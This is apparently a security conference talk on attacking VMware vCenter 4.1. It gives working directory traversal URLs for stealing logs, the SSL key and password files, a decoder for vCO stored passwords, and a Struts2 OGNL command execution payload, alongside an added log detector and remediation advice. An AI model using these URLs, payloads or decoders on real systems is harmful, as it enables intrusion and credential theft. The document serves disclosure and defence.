Invest in security to secure investments

How to hack VMware vCenter server in 60 seconds



Alexander Minozhenko
Pen-tester at Digital Security
Researcher
DEFCON RUSSIA DCG#7812 / Zeronights
DCG#7812 CTF

Thanks for ideas and support to Alexey Sintsov
What do pen-testers do?

• Scanning
• Fingerprinting
• Banner grabbing
• Play with passwords
• Find vulns.
• Exploit vulns.
• Escalate privs.
• Dig in
• Find ways to make attacks
• etc.
Static

— Source code review
  • regexp
  • formal methods
  • hand testing
— Reverse Engineering
  • formal methods
  • hands...

Dynamic

— Fuzzing (bin/web)
  + Typical bugs for class
  + Reverse Engineering
— Hand testing

Architecture Analysis (Logic flaws)
Use vuln. database (CVE/exploit-db/etc.)
Tasks:

• pwn target 8)
• show most dangerous vulns.
• show real attacks and what an attacker can do

Time:

• Not much )

Targets:

• Large number of targets, different types




VMware vCenter Server

VMware vCenter Server is a solution to manage VMware vSphere.
vSphere - virtualization operating system

[Diagram: vCenter Server manages several VMware vSphere hosts, each running multiple VMs]
VMware vCenter version 4.1 update 1

Services:

— Update Manager
— vCenter Orchestrator
— Chargeback
— Other

Each service has its own web server.

[Screenshot: VMware vCenter Server product overview with three panels: Automation (unlocks the power of VMware vSphere through proactive management), Scalability (scalable and extensible management platform), Visibility (deep visibility into every level of the virtual infrastructure)]
CVE-2009-1523

• Directory traversal in Jetty web server
• http://target:9084/vci/download/health.xml/%3f/../../../../FILE
• Discovered by Claudio Criscione
• But fixed in VMware Update Manager 4.1 update 1 :(
• Directory traversal in Jetty web server
• http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..\FILE.EXT
• Discovered by Alexey Sintsov
• Metasploit module vmware_update_manager_traversal.rb by sinn3r
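A log check a defender could run for both traversal forms above, as an added example (not code from the talk or from VASTO): it percent-decodes repeatedly, treats `..\` like `../`, and flags any request that climbs above the Update Manager download directory. The request lines and the double-encoded variant are constructed.

```ruby
# Constructed request lines in Jetty access-log style; the second and
# third are the two traversal URLs from the slides, the last is a
# double-encoded variant of the same idea.
SAMPLE_REQUESTS = [
  'GET /vci/downloads/health.xml HTTP/1.1',
  'GET /vci/download/health.xml/%3f/../../../../FILE HTTP/1.1',
  'GET /vci/downloads/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..\FILE.EXT HTTP/1.1',
  'GET /vci/downloads/%252e%252e/%252e%252e/boot.ini HTTP/1.1',
].freeze

# The Update Manager download handlers map straight onto a directory, so
# ".." is measured relative to them rather than to the URL root.
DOWNLOAD_PREFIX = %r{\A/vci/downloads?}

# Decode %XX sequences until nothing changes, so %252e%252e becomes "..".
def fully_decode(path)
  loop do
    decoded = path.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
    return decoded if decoded == path
    path = decoded
  end
end

# True when the decoded path climbs above the download directory.
# Backslashes count as separators: the 4.1u1 fix caught "../" but the
# second traversal simply used "..\" instead.
def traversal?(raw_path)
  path = raw_path.split('?', 2).first.to_s     # drop a literal query string
  relative = fully_decode(path).tr('\\', '/').sub(DOWNLOAD_PREFIX, '')
  depth = 0
  relative.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    if seg == '..'
      depth -= 1
      return true if depth < 0
    else
      depth += 1
    end
  end
  false
end

# Return the request lines whose path is a traversal attempt.
def flag_requests(lines)
  lines.select { |line| traversal?(line.split(' ')[1].to_s) }
end
```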
Directory traversal

What file to read?

Claudio Criscione proposed to read vpxd-profiler-*:

/SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-FB72656A1DCB'/Username='FakeDomain\FakeUser'/SoapSession/Id='AD45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1

• Contains logs of SOAP requests with session ID
• "VASTO - collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions." http://vasto.nibblesec.org/
• vmware_updatemanager_traversal.rb - Jetty path traversal
• vmware_session_rider.rb - Local proxy to ride stolen SOAPID sessions
Fixed in version 4.1 update 1, contains IP addresses

[Screenshot: vpxd-profiler-6.log fetched in a browser through the traversal URL on port 9084 ending in ...\ProgramData\VMware\VMware VirtualCenter\Logs\vpxd-profiler-6.log; the log begins "Section for VMware VirtualCenter, pid=3564, version=4.1.0, build=build-345043, option=Release" followed by <pullCounters> entries such as /DbStats/Pool/Cnx/InUse/total 1 and /InventoryStats/ManagedEntityStats/Clusters/total 2]
Make ARP poisoning attack
Spoof SSL certificate
Administrators check SSL cert

[Screenshot: "Security Warning" dialog shown to the administrator]
Certificate Warnings
An untrusted SSL certificate is installed on "win-9iipbe5q5br" and secure communication cannot be guaranteed. Depending on your security policy, this issue might not represent a security concern. You may need to install a trusted SSL certificate on your server to prevent this warning from appearing.
Click Ignore to continue using the current SSL certificate.
[View Certificate] [Ignore] [Cancel]
[ ] Install this certificate and do not display any security warnings for "win-9iipbe5q5br".
• Steal SSL key via directory traversal
  http://target:9084/vci/downloads/.\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key
• Make ARP spoofing
• Decrypt traffic with stolen SSL key
• What if ARP spoofing does not work?
VMware vCenter Orchestrator

• VMware vCO - software for automating configuration and management
• Installed by default with vCenter
• Has an interesting file:
  C:\Program files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties
VMware vCenter Orchestrator

• Which contains an unsalted MD5 password hash
• Could easily be brute-forced using rainbow tables

[Screenshot: passwd.properties fetched in a browser through the traversal URL on port 9084 (/vci/downloads/.%5C..%5C...)]
VMware vCenter Orchestrator Configuration

[Screenshot: vCO Configuration web interface with sections General, Network, LDAP, Database, Server Certificate, Licenses, Startup Options, Troubleshooting and Plug-ins (Mail (1.1.0), SSH (1.0.2), vCenter 4.0 (4.0.0)). The vCenter 4.0 plug-in page "VMware Virtual Infrastructure" lists Host new-virtual-center-host, Port 443, Secure channel, Path /sdk, User name vmware and a Password field, plus a "Share a unique session" strategy option. The HTML source of that page shows the PluginSave form (POST to /config/plugin/PluginSave.action) whose installPassword <input type="password"> carries a value attribute.]
VMware vCenter Orchestrator

• vCO stores passwords in files:
  • C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\plugins\VC.xml
  • C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\vmo.properties
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<virtual-infrastructure-hosts>
  <virtual-infrastructure-host>
    <enabled>true</enabled>
    <url>https://new-virtual-center-host:443/sdk</url>
    <administrator-username>vmware</administrator-username>
    <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
    <pattern>%u</pattern>
  </virtual-infrastructure-host>
</virtual-infrastructure-hosts>
Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b
vmware

00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter

• Red bytes (the first three digits) look like a length
• Green bytes (the ones that follow) are in the ASCII range
• Black bytes (the rest) look random
Algorithm of password encoding

Java (vCO encoder; pwd is the password, nbDigits the output length, rnd a java.util.Random, result a StringBuilder):

    for (int i = 0; i < nbDigits; i++) {
        int value = 0;
        if (i < pwd.length()) {
            value = pwd.charAt(i);                   // take i-th password symbol
        } else {
            value = Math.abs(rnd.nextInt() % 100);   // take random byte
        }
        String toAdd = Integer.toHexString(value + i);  // i-th password symbol + position of symbol
        result.append(toAdd);
    }

Ruby (decoder; pass is the encoded string from VC.xml):

    len = pass[0..2].to_i                    # first three digits: password length
    enc_pass = pass[3..-1].scan(/.{2}/)      # remaining hex pairs
    dec_pass = (0...len).collect do |i|
      byte = enc_pass[i].to_i(16)
      byte -= i                              # undo the position shift
      byte.chr
    end                                      # dec_pass.join is the plaintext
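The same scheme as one runnable Ruby file, as an added example (not the talk's or VMware's code): an encoder that mirrors the Java loop above and a decoder applied to the two strings from the Password Encoding slide and to the VC.xml value. The only assumption is that passwords are ASCII, as in the samples.

```ruby
# Encoded values copied from the slides; the plaintexts are what the
# decoder below recovers from them.
SAMPLES = {
  '006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b' => 'vmware',
  '00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079' => 'vcenter',
  # administrator-password from the VC.xml slide
  '010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef' => 'Password01',
}.freeze

# Mirror of the Java loop: a 3-digit length, then for each position i
# either the password byte or a random filler in 0..99, written as the
# unpadded hex of (value + i). No key is involved, so this is
# obfuscation: anyone who can read VC.xml can reverse it.
def vco_encode(pwd, nb_digits = 32, rnd = Random.new)
  out = format('%03d', pwd.length)
  nb_digits.times do |i|
    value = i < pwd.length ? pwd[i].ord : rnd.rand(100)
    out << (value + i).to_s(16)   # Integer.toHexString(value + i)
  end
  out
end

# Inverse: read the length, then subtract the position from each of the
# first `len` hex pairs. ASCII password bytes (>= 0x20) always occupy
# two hex digits, so those pairs line up; a filler below 0x10 may be a
# single digit, but it sits after the password and is never read.
def vco_decode(enc)
  len = enc[0, 3].to_i
  pairs = enc[3..-1].scan(/.{2}/)
  raise ArgumentError, 'truncated value' if pairs.length < len
  (0...len).map { |i| (pairs[i].to_i(16) - i).chr }.join
end

# The first 3 + 2*len characters depend only on the password, so the
# same password yields the same recognisable prefix in every stored copy.
def stable_prefix(pwd)
  vco_encode(pwd)[0, 3 + 2 * pwd.length]
end
```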
VMware vCenter Orchestrator uses Struts2 version 2.11 (discovered by Digital Defense, Inc.)

CVE-2010-1870 Struts2/XWork remote command execution, discovered by Meder Kydyraliev

Fixed in 4.2
#memberAccess['allowStaticMethodAccess'] = true
#foo = new java.lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('calc.exe')
Attack Vectors

• Directory traversal + ARP poisoning
• Directory traversal + password decoding/bruteforcing
• Remote code execution using Struts2 bug
• Update to latest version 4.2 update 4 or 5
• Filter access to administration services
• VMware KB 2021259
• VMware vSphere Security Hardening Guide
Conclusions

• Passwords must be stored as salted hashes or encrypted
• Fixed bugs are not always fixed in the proper way
• A pen-tester gets more profit if he tries to research something
• One simple bug and we can own the whole infrastructure